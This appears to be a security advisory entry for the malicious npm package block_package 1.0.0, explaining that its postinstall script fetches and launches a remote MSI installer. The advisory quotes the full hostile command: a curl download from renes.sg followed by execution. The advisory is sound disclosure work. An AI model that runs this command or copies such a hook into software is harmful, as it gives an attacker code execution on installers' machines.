MAL-2026-12340

    Dashboard / Malicious Package / MAL-2026-12340

    MAL-2026-12340

    Published: 5 Aug 2026Last Modified: 5 Aug 2026

    Summary: Malicious code in block_package (npm)

    Details: Source: amazon-inspector (33601d937b847af20b85c4a784ec38ae18e1543cc64dbc1dcdaf65f09437cf51) scripts/postinstall.js runs automatically during `npm install` and uses execSync to invoke `curl -O http://renes.sg/npm_block_package.msi & start npm_block_package.msi`, fetching an MSI installer from a non-publisher host over unauthenticated plain HTTP and immediately launching it on the installer's machine. The fetch is unpinned, unverified (no hash or signature check), and delivered over a channel trivially subject to tampering. The MSI is executed as the installer user, giving whoever controls renes.sg (or any on-path attacker) arbitrary code execution on every machine that installs this package.

    Affected packages

    Package

    Name: block_package

    Purl: pkg:npm/block_package

    Affected ranges

    Type: N/A

    Events:

    Introduced- None
    Fixed -None

    Affected versions

    1.0.0